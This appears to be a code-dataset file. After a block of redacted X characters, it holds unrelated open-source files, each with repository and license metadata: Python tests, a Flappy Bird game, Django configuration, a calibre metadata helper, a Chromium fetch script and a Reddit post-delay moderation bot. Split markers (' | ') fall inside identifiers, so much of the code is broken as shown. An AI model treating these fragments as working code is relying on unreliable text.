XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXX XXXXXXXXX
XXXXXXXXX XXXXXXXXX XXXXXXX XXXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXXXXX
XXXXXXXXXXX XXXXXXXXXXXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXXXX XXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXX XXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXX XXXXXXXXXX
XXXXXXXXX XXXXXXXXX XXXXXXX XXXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXX XXXXXXXXXXXX
XXXXXXX XXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXXX
XXXXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXXX XXXXXXXXXX
XXXXXXXXX XXXXXXXXX XXXXXXX XXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXX XXXXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXX XXXXXXXXXX
XXXXXXXXX XXXXXXXXX XXXXXXX XXXXXXXXXX
XXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXX XXXXXXXXX
XXXXXXXXXXXX XXXXXXXXXXXXXX
XXXXXXXXXXXXXX
XXXXXXXXXXX
XXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXX
XXXX
XXXXXXXXXXXX XXXXXXXXXX
XXXXXXXXXXXXXXX XXXXXXXXXXXXXXX
XXXXXXXXXXXXXXX
XXXXXXXXXXX
X |
vishnu2kmohan/dcos-commons | frameworks/template/tests/test_overlay.py | Python | apache-2.0 | 945 | 0.003175 | import os
import pytest
import sdk_install
import sdk_networks
import sdk_utils
from tests import config
overlay_nostrict = pytest.mark.skipif(os.environ.get("SECURITY") == "strict",
reason="overlay tests currently broken in strict")
@pytest.fixture(scope='module', autouse=True)
def configure_package(configure_security):
try:
sdk_ins | tall.uninstall(config.PACKAGE_NAME, config.SERVICE_NAME)
sdk_install.install(
config.PACKAGE_NAME,
config | .SERVICE_NAME,
config.DEFAULT_TASK_COUNT,
additional_options=sdk_networks.ENABLE_VIRTUAL_NETWORKS_OPTIONS)
yield # let the test session execute
finally:
sdk_install.uninstall(config.PACKAGE_NAME, config.SERVICE_NAME)
@pytest.mark.sanity
@pytest.mark.smoke
@pytest.mark.overlay
@overlay_nostrict
@pytest.mark.dcos_min_version('1.9')
def test_install():
sdk_networks.check_task_network("template-0-node")
|
coreyoconnor/nixops | tests/functional/test_deploys_nixos.py | Python | lgpl-3.0 | 238 | 0.004202 | from nose import tools
from tests.functional import single_ma | chine_test
class TestDeploysNixos(single_machine_test.SingleMachineTest):
def run_check(self):
self.depl.deploy()
self.check_command("test -f /etc/NIXO | S")
|
Moshifan100/pythongame | game.py | Python | gpl-3.0 | 15,122 | 0.002711 | #!/usr/bin/python3
from itertools import cycle
import random
import sys
import math
import os
import pygame
import pickle
from pygame.locals import *
pgimagel = pygame.image.load
FPS = 30
SCREENWIDTH = 288
SCREENHEIGHT = 512
# amount by which base can maximum shift to left
PIPEGAPSIZE = 100 # gap between upper and lower part of pipe
BASEY = SCREENHEIGHT * 0.79
# image, sound and hitmask dicts
IMAGES, SOUNDS, HITMASKS = {}, {}, {}
# list of all possible players (tuple of 3 positions of flap)
PLYLIST = (
# red bird
(
'assets/sprites/redbird-upflap.png',
'assets/sprites/redbird-midflap.png',
'assets/sprites/redbird-downflap.png',
),
# blue bird
(
'assets/sprites/bluebird-upflap.png',
'assets/sprites/bluebird-midflap.png',
'assets/sprites/bluebird-downflap.png',
),
# yellow bird
(
'assets/sprites/yellowbird-upflap.png',
'assets/sprites/yellowbird-midflap.png',
'assets/sprites/yellowbird-downflap.png',
),
)
# list of backgrounds
BACKGROUNDS_LIST = (
'assets/sprites/background-day.png',
'assets/sprites/background-night.png',
)
# list of pipes
PIPE_LIST = (
'assets/sprites/pipe-green.png',
'assets/sprites/pipe-red.png',
'assets/sprites/pipe-blue.png',
)
try:
xrange
except NameError:
xrange = range
def main():
global SCREEN, FPSCLOCK
pygame.init()
FPSCLOCK = pygame.time.Clock()
SCREEN = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))
pygame.display.set_caption('Flappy Bird')
# game over sprite
IMAGES['gameover'] = pgimagel('assets/sprites/gameover.png').convert_alpha()
# message sprite for welcome screen
IMAGES['message'] = pgimagel('assets/sprites/message.png').convert_alpha()
# base (ground) sprite
IMAGES['base'] = pgimagel('assets/sprites/base.png').convert_alpha()
# numbers sprites for score display
IMAGES['numbers'] = (
pgimagel('assets/sprites/0.png').convert_alpha(),
pgimagel('assets/sprites/1.png').convert_alpha(),
pgimagel('assets/sprites/2.png').convert_alpha(),
pgimagel('assets/sprites/3.png').convert_alpha(),
pgimagel('assets/sprites/4.png').convert_alpha(),
pgimagel('assets/sprites/5.png').convert_alpha(),
pgimagel('assets/sprites/6.png').convert_alpha(),
pgimagel('assets/sprites/7.png').convert_alpha(),
pgimagel('assets/sprites/8.png').convert_alpha(),
pgimagel('assets/sprites/9.png').convert_alpha()
)
# sounds below
SOUNDS['die'] = pygame.mixer.Sound('assets/audio/die.ogg')
SOUNDS['hit'] = pygame.mixer.Sound('assets/audio/hit.ogg')
SOUNDS['point'] = pygame.mixer.Sound('assets/audio/point.ogg')
SOUNDS['swoosh'] = pygame.mixer.Sound('assets/audio/swoosh.ogg')
SOUNDS['wing'] = pygame.mixer.Sound('assets/audio/wing.ogg')
while True:
# select random background sprites
randBg = random.randint(0, len(BACKGROUNDS_LIST) - 1)
IMAGES['background'] = pgimagel(BACKGROUNDS_LIST[randBg]).convert()
# select random player sprites
rPlayer = random.randint(0, len(PLYLIST) - 1)
IMAGES['player'] = (
pgimagel(PLYLIST[rPlayer][0]).convert_alpha(),
pgimagel(PLYLIST[rPlayer][1]).convert_alpha(),
pgimagel(PLYLIST[rPlayer][2]).convert_alpha(),
)
# select random pipe sprites
pipeindex = random.randint(0, len(PIPE_LIST) - 1)
IMAGES['pipe'] = (
pygame.transform.rotate(
pgimagel(PIPE_LIST[pipeindex]).convert_alpha(), 180),
pgimagel(PIPE_LIST[pipeindex]).convert_alpha(),
)
# hismask for pipes
HITMASKS['pipe'] = (
getHitmask(IMAGES['pipe'][0]),
getHitmask(IMAGES['pipe'][1]),
)
# hitmask for player
HITMASKS['player'] = (
getHitmask(IMAGES['player'][0]),
getHitmask(IMAGES['player'][1]),
getHitmask(IMAGES['player'][2]),
)
movementInfo = showWelcomeAnimation()
crashInfo = mainGame(movementInfo)
showGameOverScreen(crashInfo)
def showWelcomeAnimation():
"""Shows welcome screen animation of flappy bird"""
# index of player to blit on screen
pIndex = 0
pIndexGen = cycle([0, 1, 2, 1])
# iterator used to change pIndex after every 5th iteration
loopIter = 0
playerx = int(SCREENWIDTH * 0.2)
playery = int((SCREENHEIGHT - IMAGES['player'][0].get_height()) / 2)
messagex = int((SCREENWIDTH - IMAGES['message'].get_width()) / 2)
messagey = int(SCREENHEIGHT * 0.12)
basex = 0
# amount by which base can maximum shift to left
baseShift = IMAGES['base'].get_width() - IMAGES['background'].get_width()
# player values
playerShmVals = {'val': 0, 'dir': 1}
while True:
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
if event.type == pygame.MOUSEBUTTONDOWN or (event.type == pygame.KEYUP and event.key == K_SPACE):
# first flap goes to maingame
SOUNDS['wing'].play()
return {
'playery': playery + playerShmVals['val'],
'basex': basex,
'pIndexGen': pIndexGen,
}
# adjust playery, pIndex, basex
if (loopIter + 1) % 5 == 0:
pIndex = next(pIndexGen)
loopIter = (loopIter + 1) % 30
basex = -((-basex + 4) % baseShift)
playerShm(playerShmVals)
# draw sprites
SCREEN.blit(IMAGES['background'], (0,0))
SCREEN.blit(IMAGES['player'][pIndex],
(playerx, playery + playerShmVals['val']))
SCREEN.blit(IMAGES['message'], (messagex, messagey))
SCREEN.blit(IMAGES['base'], (basex, BASEY))
pygame.display.update()
FPSCLOCK.tick(FPS)
def mainGame(movementInfo):
score = pIndex = loopIter = 0
pIndexGen = movementInfo['pIndexGen']
playerx, playery = int(SCREENWIDTH * 0.2), movementInfo['playery']
basex = movementInfo['basex']
baseShift = IMAGES['base'].get_width() - IMAGES['background'].get_width()
# get 2 random new pipes to add to highPipes lowPipes list of pipes
newPipe1 = getRandomPipe()
newPipe2 = getRandomPipe()
# list of upper pipes
highPipes = [
{'x': SCREENWIDTH + 200, 'y': newPipe1[0]['y']},
{'x': SCREENWIDTH + 200 + (SCREENWIDTH / 2), 'y': newPipe2[0]['y']},
]
# list of lowerpipe
| lowPipes = [
{'x': SCREENWIDTH + 200, 'y': newPipe1[1]['y']},
{'x': SCREENWIDTH + 200 + (SCREENWIDTH / 2), 'y': newPipe2[1]['y']},
]
pipeVelX = -4
# player velocity, max velocity, downward ac | cleration, accleration on flap
playerVelY = -9 # player's velocity along Y, default same as playerFlapped
playerMaxVelY = 10 # max vel along Y, max descend speed
playerMinVelY = -8 # min vel along Y, max ascend speed
playerAccY = 1 # players downward accleration
playerFlapAcc = -9 # players speed on flapping
playerFlapped = False # True when player flaps
while True:
for event in pygame.event.get():
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
if event.type == pygame.MOUSEBUTTONDOWN or (event.type == pygame.KEYUP and event.key == K_SPACE):
if playery > -2 * IMAGES['player'][0].get_height():
playerVelY = playerFlapAcc
playerFlapped = True
SOUNDS['wing'].play()
# check for if the bird crashed here
Testcrash = checkCrash({'x': playerx, 'y': playery, 'index': pIndex},
highPipes, lowPipes)
if Testcrash[0]:
return {
'y': playery,
'groundCrash': Testcrash[1],
'basex': basex,
'highPipes': h |
burk/helgapp | manage.py | Python | mit | 250 | 0 | #!/usr/bin/env python
import os
import s | ys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "helgapp.settings")
from django.core.management impo | rt execute_from_command_line
execute_from_command_line(sys.argv)
|
Donkyhotay/MoonPy | zope/security/tests/test_adapter.py | Python | gpl-3.0 | 948 | 0 | ##############################################################################
#
# Copy | right (c) 2004 Zope Corporation and Contributors.
# All R | ights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
$Id: test_adapter.py 67630 2006-04-27 00:54:03Z jim $
"""
import unittest
from zope.testing.doctestunit import DocTestSuite
def test_suite():
return unittest.TestSuite((
DocTestSuite('zope.security.adapter'),
))
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
bkidwell/caliload | caliload/metadata.py | Python | gpl-3.0 | 3,883 | 0.023178 | # Copyright 2011 Brendan Kidwell <brendan@glump.net>.
#
# This file is part of caliload.
#
# caliload is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# caliload is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with caliload. If not, see <http://www.gnu.org/licenses/>.
"""Interface to metadata. | opf ."""
from caliload.configobject import ConfigObject
from caliload.optionsobject import OptionsObject
from glob import glob
from uuid import uuid1
from xml.dom import minidom
import os
import subprocess
config = ConfigObject()
options = OptionsObject()
import logging
log = logging.getLogger(__name__)
def get_text(nodelist):
    """Concatenate the character data of every text node in *nodelist*."""
    # Non-text nodes (elements, comments, ...) are skipped; child elements
    # are NOT recursed into, matching minidom's flat childNodes view.
    return ''.join(
        node.data for node in nodelist if node.nodeType == node.TEXT_NODE
    )
def get_book_filename(dir):
    """Find the ebook file in *dir*, preferring .epub over .pdf.

    Files whose basename starts with an underscore are treated as private
    scratch copies and skipped.

    Returns:
        A ``(path, filetype)`` tuple where ``filetype`` is "epub" or "pdf".

    Raises:
        RuntimeError: if no candidate ebook file exists.
    """
    for ext in ("epub", "pdf"):
        for path in glob(os.path.join(dir, "*.%s" % ext)):
            # Bug fix: the old code tested path[0] == '_', i.e. the first
            # character of the *whole path*, so underscore-prefixed files
            # were never actually skipped once a directory was prepended.
            if not os.path.basename(path).startswith('_'):
                return (path, ext)
    raise RuntimeError("Can't find an ebook file.")
class Metadata:
    """Wrapper around a book's metadata.opf sidecar file.

    On construction the OPF is extracted from the ebook (via the external
    tool configured as ``config.ebookmeta_cmd`` -- presumably Calibre's
    ``ebook-meta``; confirm) when needed, parsed, and guaranteed to carry
    a 'caliload' UUID that is mirrored in a plain-text ``uuid`` file.
    """
    def __init__(self, useCached=True):
        """Load metadata for the ebook found in options.dir.

        Args:
            useCached: if True, reuse an existing metadata.opf on disk;
                if False, always re-extract it from the ebook file.
        """
        self.xmlfilename = os.path.join(options.dir, 'metadata.opf')
        self.bookfile, self.type = get_book_filename(options.dir)
        if not useCached or not os.path.exists(self.xmlfilename):
            if useCached:
                log.info("metadata.opf not found. Extracting from %s." % os.path.basename(self.bookfile))
            else:
                log.info("Loading metadata.opf from %s." % os.path.basename(self.bookfile))
            # Dump the book's embedded metadata to metadata.opf.
            cmd = [
                config.ebookmeta_cmd, self.bookfile, '--to-opf=%s' % self.xmlfilename
            ]
            subprocess.check_output(cmd)
        log.info("Reading %s." % os.path.basename(self.xmlfilename))
        self.xml = minidom.parse(self.xmlfilename)
        self.metadata = self.xml.getElementsByTagName('metadata')[0]
        self.uuidfile = os.path.join(options.dir, 'uuid')
        # Look for an identifier previously written by caliload.
        self.id = None
        for e in self.metadata.getElementsByTagName('dc:identifier'):
            scheme = e.getAttribute('opf:scheme')
            if scheme.lower() == 'caliload': self.id = get_text(e.childNodes)
        if self.id is None:
            self.recover_or_generateId()
        # Keep a plain-text copy of the UUID next to the book.
        if not os.path.exists(self.uuidfile):
            f = open(self.uuidfile, 'w')
            f.write(self.id + '\n')
            f.close()
    def recover_or_generateId(self):
        """Load UUID from uuid file or generate a new UUID; store UUID in metadata.opf ."""
        if os.path.exists(self.uuidfile):
            log.info("Found ID in uuid file. Writing to %s." % os.path.basename(self.xmlfilename))
            f = open(self.uuidfile, 'r')
            self.id = f.read().strip()
            f.close()
        else:
            log.info("ID not found. Creating and saving a new ID.")
            self.id = str(uuid1())
            f = open(self.uuidfile, 'w')
            f.write(self.id + '\n')
            f.close()
        # write data to XML doc
        e = self.xml.createElement('dc:identifier')
        e.setAttribute('opf:scheme', 'caliload')
        textNode = self.xml.createTextNode(str(self.id))
        e.appendChild(textNode)
        self.metadata.appendChild(e)
        # save metadata.opf
        # NOTE(review): toprettyxml(..., encoding=...) returns bytes; writing
        # them to a text-mode handle only works on Python 2 -- verify if this
        # ever runs under Python 3.
        f = open(self.xmlfilename, 'w')
        f.write(self.xml.toprettyxml(indent='', newl='', encoding='utf-8'))
        f.close()
    def write_to_book(self):
        """Write metadata.opf to ebook file."""
        log.info("Writing metadata.opf to book file.")
        # erase old tags
        cmd = [
            config.ebookmeta_cmd, self.bookfile, "--tags="
        ]
        subprocess.check_output(cmd)
        # write all metadata from opf file
        cmd = [
            config.ebookmeta_cmd, self.bookfile, '--from-opf=%s' % self.xmlfilename
        ]
        subprocess.check_output(cmd)
|
chromium/chromium | third_party/android_deps/libs/com_android_support_support_media_compat/3pp/fetch.py | Python | bsd-3-clause | 2,505 | 0 | #!/usr/bin/env python3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This is generated, do not edit. Update BuildConfigGenerator.groovy and
# 3ppFetch.template instead.
import argparse
import json
import os
import re
import urllib.request
_REPO_URL = 'https://dl.google.com/dl/android/maven2'
_GROUP_NAME = 'com/android/support'
_MODULE_NAME = 'support-media-compat'
_FILE_EXT = 'aar'
_OVERRIDE_LATEST = None
_PATCH_VERSION = 'cr1'
def do_latest():
    """Print the latest upstream Maven version plus the local patch suffix."""
    if _OVERRIDE_LATEST is not None:
        # A pinned version takes precedence over whatever Maven reports.
        print(_OVERRIDE_LATEST + f'.{_PATCH_VERSION}')
        return
    maven_metadata_url = '{}/{}/{}/maven-metadata.xml'.format(
        _REPO_URL, _GROUP_NAME, _MODULE_NAME)
    metadata = urllib.request.urlopen(maven_metadata_url).read().decode(
        'utf-8')
    # Do not parse xml with the python included parser since it is susceptible
    # to maliciously crafted xmls. Only use regular expression parsing to be
    # safe. RE should be enough to handle what we need to extract.
    match = re.search('<latest>([^<]+)</latest>', metadata)
    if match:
        latest = match.group(1)
    else:
        # if no latest info was found just hope the versions are sorted and the
        # last one is the latest (as is commonly the case).
        latest = re.findall('<version>([^<]+)</version>', metadata)[-1]
    print(latest + f'.{_PATCH_VERSION}')
def get_download_url(version):
    """Print a partial 3pp manifest (JSON) for the given package version."""
    # Strip the local Chromium patch suffix (e.g. "28.0.0.cr1" -> "28.0.0")
    # before building the upstream Maven URL.
    upstream, patch = version.rsplit('.', 1)
    if patch.startswith('cr'):
        version = upstream
    file_name = '{}-{}.{}'.format(_MODULE_NAME, version, _FILE_EXT)
    file_url = '/'.join(
        [_REPO_URL, _GROUP_NAME, _MODULE_NAME, version, file_name])
    partial_manifest = {
        'url': [file_url],
        'name': [file_name],
        'ext': '.' + _FILE_EXT,
    }
    print(json.dumps(partial_manifest))
def main():
ap = argparse.ArgumentParser()
sub = ap.add_subparsers()
latest = sub.add_parser('latest')
latest.set_defaults(func=lambda _opts: do_latest())
download = sub.add_parser('get_url')
download.set_defaults(
func=lambda _opts: get_download_url(os.environ['_3PP_VERSION']))
opts = ap.parse_args()
opts.func(opts)
if __name__ == '__main__':
main()
|
dolphinkiss/cookiecutter-django-aws-eb | {{cookiecutter.project_name}}/wsgi_extra.py | Python | mit | 145 | 0 |
# Wraps Django's normal WSGI application in WhiteNoise.
from whitenoise.djan | go imp | ort DjangoWhiteNoise
application = DjangoWhiteNoise(application)
|
TacticalGoat/reddit | DelayBot/delaybot.py | Python | mit | 3,987 | 0.021319 | #This bot was written by /u/GoldenSights for /u/FourMakesTwoUNLESS on behalf of /r/pkmntcgtrades. Uploaded to GitHub with permission.
import praw
import time
import datetime
import sqlite3
'''USER CONFIGURATION'''
APP_ID = ""
APP_SECRET = ""
APP_URI = ""
APP_REFRESH = ""
# https://www.reddit.com/comments/3cm1p8/how_to_make_your_bot_use_oauth2/
USERAGENT = ""
#This is a short description of what the bot does. For example "/u/GoldenSights' Newsletter Bot"
SUBREDDIT = ""
#This is the sub or list of subs to scan for new posts. For a single sub, use "sub1". For multiple subreddits, use "sub1+sub2+sub3+..."
MAXPOSTS = 30
#This is how many posts you want to retrieve all at once. PRAW can download 100 at a time.
WAIT = 20
#This is how many seconds you will wait between cycles. The bot is completely inactive during this time.
DELAY = 518400
#This is the time limit between a user's posts, IN SECONDS. 1h = 3600 || 12h = 43200 || 24h = 86400 || 144h = 518400
'''All done!'''
WAITS = str(WAIT)
sql = sqlite3.connect('sql.db')
print('Loaded SQL Database')
cur = sql.cursor()
cur.execute('CREATE TABLE IF NOT EXISTS users(name TEXT, lastpost TEXT)')
print('Loaded Users')
cur.execute('CREATE TABLE IF NOT EXISTS oldposts(id TEXT)')
print('Loaded Oldposts')
sql.commit()
r = praw.Reddit(USERAGENT)
r.set_oauth_app_info(APP_ID, APP_SECRET, APP_URI)
r.refresh_access_information(APP_REFRESH)
def getTime(as_unix):
    """Return the current UTC time.

    Args:
        as_unix: if truthy, return the POSIX timestamp (float);
            otherwise return a timezone-aware datetime object.
    """
    # The parameter used to be named ``bool`` (shadowing the builtin) and
    # compared with ``== False``; all callers pass it positionally, so the
    # rename and the truthiness test are safe, clearer equivalents.
    now = datetime.datetime.now(datetime.timezone.utc)
    return now.timestamp() if as_unix else now
def scan():
    """Fetch the newest posts in SUBREDDIT and enforce the posting delay.

    First-time authors are recorded in the ``users`` table and sent a
    welcome message.  A known author whose recorded previous post is
    younger than DELAY seconds has the new post removed with an
    explanatory comment; otherwise the new post becomes their reference.
    Every handled post id is stored in ``oldposts`` so it is processed
    only once.
    """
    print('Scanning ' + SUBREDDIT)
    subreddit = r.get_subreddit(SUBREDDIT)
    posts = subreddit.get_new(limit=MAXPOSTS)
    for post in posts:
        # Deleted accounts have no .author object, hence the broad catch.
        try:
            pauthor = post.author.name
        except Exception:
            pauthor = '[deleted]'
        pid = post.id
        plink = post.short_link  # NOTE(review): currently unused
        ptime = post.created_utc
        # Skip posts already handled in an earlier cycle.
        cur.execute('SELECT * FROM oldposts WHERE id=?', [pid])
        if not cur.fetchone():
            cur.execute('SELECT * FROM users WHERE name=?', [pauthor])
            if not cur.fetchone():
                # First post ever seen from this author: record and greet.
                print('Found new user: ' + pauthor)
                cur.execute('INSERT INTO users VALUES(?, ?)', (pauthor, pid))
                r.send_message(pauthor, 'Welcome','Dear ' + pauthor + ',\n\n This appears to be your first time here', captcha=None)
                sql.commit()
                print('\t' + pauthor + ' has been added to the database.')
                time.sleep(5)
            else:
                cur.execute('SELECT * FROM users WHERE name=?', [pauthor])
                fetch = cur.fetchone()
                print('Found post by known user: ' + pauthor)
                # Fetch the author's previously recorded submission to
                # measure how long ago it was made.
                previousid = fetch[1]
                previous = r.get_info(thing_id='t3_'+previousid)
                previoustime = previous.created_utc
                if ptime > previoustime:
                    curtime = getTime(True)
                    difference = curtime - previoustime
                    if difference >= DELAY:
                        # Enough time has passed: the new post becomes the
                        # author's reference post.
                        print('\tPost complies with timelimit guidelines. Permitting')
                        cur.execute('DELETE FROM users WHERE name=?', [pauthor])
                        cur.execute('INSERT INTO users VALUES(?, ?)', (pauthor, pid))
                        sql.commit()
                        print('\t' + pauthor + "'s database info has been reset.")
                    else:
                        # Too soon: format the remaining wait as
                        # "H hours, and M minutes." (the 'x' marker drops the
                        # seconds field), then remove the post.
                        differences = '%.0f' % (DELAY - difference)
                        timestring = str(datetime.timedelta(seconds=float(differences)))
                        timestring = timestring.replace(':', ' hours, and ', 1)
                        timestring = timestring.replace(':', ' minutes.x', 1)
                        timestring = timestring.split('x')
                        timestring = timestring[0]
                        print('\tPost does not comply with timelimit guidelines. Author must wait ' + timestring)
                        print('\t' + pauthor + "'s database info remains unchanged")
                        response = post.add_comment('You are posting here too frequently, so your post has been deleted. You may post again in ' + str(timestring))
                        response.distinguish()
                        post.remove(spam=False)
                        time.sleep(5)
        cur.execute('INSERT INTO oldposts VALUES(?)', [pid])
        sql.commit()
while True:
try:
scan()
except Exception as e:
print('An error has occured:', e)
print('Running again in ' + WAITS + ' seconds.\n')
time.sleep(WAIT)
|
mhruscak/pyparted | tests/test_parted_filesystem.py | Python | gpl-2.0 | 2,438 | 0.002461 | #
# Test cases for the methods in the parted.filesystem module itself
#
# Copyright (C) 2009-2011 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PUR | POSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Bost | on, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): David Cantrell <dcantrell@redhat.com>
#
import unittest
# One class per method, multiple tests per class. For these simple methods,
# that seems like good organization. More complicated methods may require
# multiple classes and their own test suite.
@unittest.skip("Unimplemented test case.")
class FileSystemNewTestCase(unittest.TestCase):
def runTest(self):
# TODO
self.fail("Unimplemented test case.")
@unittest.skip("Unimplemented test case.")
class FileSystemGetSetTestCase(unittest.TestCase):
def runTest(self):
# TODO
self.fail("Unimplemented test case.")
@unittest.skip("Unimplemented test case.")
class FileSystemGetPedFileSystemTestCase(unittest.TestCase):
def runTest(self):
# TODO
self.fail("Unimplemented test case.")
@unittest.skip("Unimplemented test case.")
class FileSystemStrTestCase(unittest.TestCase):
def runTest(self):
# TODO
self.fail("Unimplemented test case.")
# And then a suite to hold all the test cases for this module.
def makeSuite():
suite = unittest.TestSuite()
suite.addTest(FileSystemNewTestCase())
suite.addTest(FileSystemGetSetTestCase())
suite.addTest(FileSystemGetPedFileSystemTestCase())
suite.addTest(FileSystemStrTestCase())
return suite
s = makeSuite()
if __name__ == "__main__":
unittest.main(defaultTest='s', verbosity=2)
|
Tsumiki-Chan/Neko-Chan | classes/messagehandler.py | Python | gpl-3.0 | 1,344 | 0.005952 | from functions import logger, config
import asyncio
class MessageHandler:
    """Carries the pieces every command needs: client, message, command, args.

    Disabling this module will break the whole bot.
    """
    def __init__(self, client, message, command, args):
        """Capture the invoking message plus default permission levels."""
        self.client = client
        self.message = message
        self.command = command
        self.channel = message.channel
        self.access_level = 0
        self.needed_level = 6
        self.args = args
    async def sendMessage(self, text, channel=None):
        """Send a text message.

        Arguments:
            text: the message to send (converted with str()).
            channel: optional target; defaults to the invoking channel.
        Returns:
            The message object returned by the client.
        Raises:
            ValueError: if the text is empty or exceeds 2000 characters.
        """
        body = str(text)
        if not body:
            raise ValueError("The message needs at least one character.")
        if len(body) > 2000:
            raise ValueError("The message can't be more than 2000 chars")
        target = self.channel if channel is None else channel
        # \u200B is a zero-width space prefix -- presumably it keeps the reply
        # from triggering other bots' command prefixes; confirm before removing.
        return await self.client.send_message(target, "\u200B" + body)
rossjones/ScraperWikiX | web/urls.py | Python | agpl-3.0 | 3,556 | 0.005062 | from django.conf.urls.defaults import *
import frontend.views as frontend_views
import codewiki.views
import codewiki.viewsuml
from django.contrib.syndication.views import feed as feed_view
from django.views.generic import date_based, list_detail
from django.views.generic.simple import direct_to_template
from django.contrib import admin
import django.contrib.auth.views as auth_views
from django.conf import settings
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect
from django.contrib import admin
admin.autodiscover()
# Need to move this somewhere more useful and try to make it less hacky but
# seems | to be the easiest way unfortunately.
from django.contrib.auth.models import User
User._meta.ordering = ['username']
from frontend.feeds import LatestCodeObjects, LatestCodeObjectsBySearchTerm, LatestCodeObjectsByTag, LatestViewObjects, LatestScraperObjects
feeds = {
'all_code_objects': LatestCodeObjects,
'all_scrapers': LatestScraperObjects,
'all_views': Latest | ViewObjects,
'latest_code_objects_by_search_term': LatestCodeObjectsBySearchTerm,
'latest_code_objects_by_tag': LatestCodeObjectsByTag,
}
urlpatterns = patterns('',
url(r'^$', frontend_views.frontpage, name="frontpage"),
# redirects from old version (would clashes if you happen to have a scraper whose name is list!)
(r'^scrapers/list/$', lambda request: HttpResponseRedirect(reverse('scraper_list_wiki_type', args=['scraper']))),
url(r'^', include('codewiki.urls')),
url(r'^logout/$', auth_views.logout, {'next_page': '/'}, name="logout"),
url(r'^accounts/', include('registration.urls')),
url(r'^accounts/resend_activation_email/', frontend_views.resend_activation_email, name="resend_activation_email"),
